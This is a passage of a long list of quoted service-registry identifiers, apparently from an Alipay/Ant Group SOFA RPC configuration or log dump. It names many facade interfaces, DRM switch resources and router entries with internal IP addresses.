OUTER","com.alipay.iaassettrans.facade.iaasset.api.IaAssetTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_GOTONE_MESSAGE_RECEIVE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.etetestcore:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerTairCache_dest.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.loadInitiativeDaemonModifyDelay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.244.23#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.OrdermngDegradeDRM.preCheckSpecialChar,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.insmobile.insmobileDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openeval.common.service.facade.activityha.ActivityhaServiceSpi:1.0:ampeGeniePreAuditService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.biz.shared.instwithdraw.repository.InstWithdrawOrderRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.membertangram.common.service.facade.application.UserApplicationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.openapi.clientswitch.ClientSwitchPlanOpenFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MWEALTHPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airbops.service.common.proxy.tradequery.facade.ProxyTradeLogisticsQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.common.service.facade.UserCenterClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gpfnfiveaccount.facade.api.AccountCreditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.common.service.facade.api.SpiTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_mbaprod_integrity_sync_distribute#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.158.117.145#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:rdeclarecenter_acl_processCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:insiopbff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbitemprod.common.service.facade.backend.api.item.ItemSyncBackendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admediamgr.common.service.facade.service.QtMgrSspFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprotocol.kyc.service.facade.KycQualifiedInvestorLevelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.channel.config.SettleDepositConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jss.mc.facade.MessageSenderWebService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorSnapshotResource.isProtocolSupplement,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cscenter.service.cat.facade.CatService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dtbank.facade.config.ConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:lifeexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accustomercore.common.service.facade.passport.PassInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FCINTCLCN#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.revtransTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mydds:name=com.alipay.cif.drm.PasswordRevokeSwitch.operationPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchpunish.facade.cicada.punishment.PunishmentMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwsap.common.service.facade.datasource.OdpsProjectService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.agreement.OpenAgreementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.topic.TopicRelatedContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ufe.engine.facade.runtime.UfeScriptService:1.0:bkfeaturecloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.ShopMiniAppLayoutFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.paycheckerCZTBaseCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfpcenter:name=com.alipay.zcache.tbase.cardbinMdmTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_OMOCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.125.234#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.69.213.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gffintrade.common.service.facade.api.SettlementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:beyondtrustace@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.common.service.facade.EventTaskResDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.139.143#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.gfmdm.common.service.facade.api.MasterDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cfpcenter.emc.common.service.facade.api.EmcStandardTransFacade:1.0:cfpcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.152#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.159.154#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dmeta.facade.virtual.VirtualEntityTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.126.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifemng.facade.autoaccess.EbppChargeoffInstFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:ecsportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcsc.common.service.facade.group.GroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.settling.common.service.facade.MerchantInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custprod.service.api.register.RegistionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","io.sofastack.cafe.workflowx.sofarpc.facade.WorkflowxRPCInvocationFacade:1.0:SERVERLESS_PLAN_WF_ARK_INSTALL_V2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmerchant.service.facade.MemberTemplateShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbticketcenter.common.service.facade.api.TicketTemplateOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchopmng.merchant.common.service.facade.api.AttachmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcp.service.facade.kb.adrecord.AdRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_ANTTOCFIN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.contentlib.common.service.facade.ugcpublisher.ContentUgcPublisherSwitchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:policy-hub-adaptor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfarm.common.service.facade.CharityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isre.bm.sdk.facade.ApiGateway:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumeprod.common.service.facade.AssetQueryRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.DrmManageFacade:1.0:pure_opssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.core.service.drm.impl.ComplainConclusionSwitchImpl.autoEndNewNotifyScenes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.antcloud.loadcenter.facade.LoadCenterCloudApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.qualityprod.service.riskctrl.spi.ChangeCtrlCallbackService:1.0:ordermng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.service.CapitalBizQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.open.common.CatalogOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.purchase.FintradePurchaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.battle.battleFieldHomeHotlistPosition,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsettle.service.facade.common.api.BizOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.MobileFamilyAccountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.live.api.LiveAssemblyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.6.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfoprod.common.service.cds.facade.FrameTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ngfesync.facade.sync.NgfeSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.autodrive.AutoPayConfigOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.MessageSpi:1.0:mobileacauth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ifim.biz.risk.manager.RiskConfirmManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:familycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.newsync.NewsDataSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcTimeDelayed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:progov@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.mohelper.common.service.facade.CardBinService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baitiaoprod.common.service.facade.mng.query.BaitiaoProdInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.processmng:name=com.alipay.processmng.core.service.cache.ProcessmngCacheConfigSwitch.cache_switch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:ifcidentitycloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchasset.common.service.facade.common.AssetInfoValidateFacade:1.0:XXX@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.233#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.159.156#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inshealthcore.common.service.facade.api.account.HealthAssetPolicyShareFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.zpublish.biz.shared.utils.NodeParameters.nationIdcStrList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.quotnearsource.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthcore.common.service.facade.api.product.GiftProductMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileanti.common.service.mvcfacade.service.CustomsEntryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.bizlogicide.common.service.facade.api.BizLogicPackageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.changeriskmanage.common.service.facade.callback.ProcessCallback:1.0:algorithmProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.100.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.riskmng.common.service.facade.api.RiskTaskSceneCaseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:sffgroup-rocky#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dwmdps.common.service.DataAppService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custrelation.service.facade.MobileContactExtService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxquote.service.facade.api.IfxClientQuoteDefintionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.ding.DingCorpUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.holoxmng.content.service.facade.HoloxRiskSamplePictureLinkManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vehownerprod.facade.test.EtcReconClearInfoTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.gacplatform.facade.api.GacPlatformServiceFacade:1.0:fporgassetdecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.socialportal.web.salary.rpc.facade.SalaryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:finopencore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.157.237#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.106.33#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.autoinsprod.common.service.facade.MarketingActivityFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rule.common.base.service.ScriptValidateService:1.0:MOBILEIC@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.contact.facade.ContactCatService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.api.AppOperateLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bis.common.service.facade.face.FaceOfflineService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zonemng.facade.api.ZoneColorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.87.231#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.financeprod:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csshield.service.facade.mng.AnswerResultMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tss.supportprod.facade.emergency.EmcPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:buscard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.alipay.server.demo.facade.rpc.E3RpcElasticServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.rdf.ficc.common.loadtestableschedule.drm.LoadTestableScheduleDrm.spr-fund-redeem-execute-unknown.loadTestEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifecustprod.common.service.facade.search.SearchSupplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.product.spi.SecurityBiologyProductService:1.0:mediafeature@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.cluster.facade.AlgorithmAssistanceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ANTGRAPHCONSOLE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.CommonCmdConfigDrm.modifyCmdStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promoprod.common.service.facade.isv.IsvFileReceiptNotifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.live.api.LiveRelatedProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfas.core.service.api.FundTransferProcessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.core.basic.LinkCheckManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantprod.common.service.facade.bizconfig.MerchantBizConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bumng:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_C_CCR#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcinstacc.facade.quality.ToDoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.SavingPlanDrmImpl.avaliableTemplateIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.30.209.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.rds:name=com.alipay.rdsguard.drm.RdsGlobalSwitchDrmResource.globalSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.punishcenter.common.service.facade.ImmunityNameListService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-fanfankoi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.exchange.ExchangeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:dscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.zpaas.zappinfo.facade.query.ZoneEnvQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_fixedOptionalDepositMaxTotalLimitAmtProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmportal.service.master.MasterProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.facade.grab.GrabShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_SOFASENTINEL-DIRECT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.alideviceinfo.biz.shared.pocketmoney.PocketMoneyIndexService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.api.InsPolicyApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.27.98#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.dataphin.publishing.common.facade.submit.PrePublishSpi:1.0:dpdataprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:csmng-loginShareInfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:instdatalink@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.common.service.facade.fund.FundRuleRelationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cmsmng:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.businessPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finrepaycenter.common.service.facade.RepayBatchOrderOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.user.contacts.ContactsQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amspm.ardd.common.support.api.ScriptDataServiceFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfundprotocol:name=com.alipay.finfundprotocol.common.service.facade.drm.ShumiSwitchDrmConfig.userPercentSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insautomarket.common.facade.activity.AutoMktActivityConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.AdminOperateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:finpromobus_promobenchFcProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulemng.common.service.facade.rulebizscript.RuleBizScriptManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:voucherCoreTemplateCopyTaskCallback@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iexpbizprod.common.service.facade.storefront.tr.StorefrontFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.protocol-https:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.autoinsprod.common.claim.AutoInsClaimQueryFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkoyzcore_priceProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:aeicore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.channel.PublicChannelsFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:secucommunity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdarttool.iot.schema.RpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cdp.common.service.facade.targeting.TargetingQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unifiedlimit.facade.manage.DeployGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.CommonSendPushService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofabootRPC.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.idpatrol.core.service.ruleEntrance.service.PocEntranceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:promobench_planBudgetProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.144.191#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finassetpreference.api.facade.FundRatingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yeb.YebTtcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:oceanbasecapacity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.index.MarketIndexFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.comprehensive.zskynet.zdalExplorerDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.certifymng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.logLevelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.msfluxconf:name=com.alipay.fc.fluxconf.fluxconfClient.drm.CtrlDataResource.pageRows,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antfin.atdatacollect.common.facade.BlockTransactionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:promodataprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.meshyorg.com.service.integration.cryptlib.EncryptService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.loan.impl.support.drm.UcaMigrateOperateDrm.loanApplyCreditCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.pcAvailableBooths,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:cmi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.190.143#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.appxagg.common.service.facade.api.management.video.VideoMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_I